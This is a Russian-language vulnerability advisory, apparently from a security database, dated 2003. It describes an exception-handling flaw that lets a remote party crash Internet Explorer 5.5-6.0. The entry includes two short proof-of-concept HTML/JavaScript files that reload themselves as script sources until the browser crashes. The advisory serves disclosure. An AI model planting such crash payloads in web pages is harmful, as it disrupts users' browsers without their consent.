Дата публикации: | 09.07.2003 |
Всего просмотров: | 1233 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость в обработке исключительных ситуаций обнаружена в Microsoft Internet explorer. Удаленный пользователь может аварийно завершить работу программы.
Следующий пример приведет к аварийному завершению работы программы: --------------------[Crash.html]-------------------- window.moveTo(screen.width,screen.height); document.all.tags("script")[0].src="Crash.html"; //<script src="Crash.html"></script> -----------------[End of Crash.html]---------------На результат влияют множество факторов – количество запущенных копий Internet explorer и символов в документе. Например, если открыто только одно окно Internet explorer, то можно использовать следующий код, чтобы точно зафиксировать время аварии: --------------------[Demo.html]-------------------- if(!window.counter) { window.counter=1; alert("Internet Explorer will be crashed after 3-5 cycle"); } window.counter++; alert(window.counter); document.all.tags("script")[0].src="demo.html"; //<script src="demo.html"></script> -----------------[End of Demo.html]----------------Работа IE аварийно завершится на 3-5 цикле программы. Уязвимость обнаружена в Microsoft Internet explorer 5.5-6.0 |
Ссылки: | Internet Explorer Crash |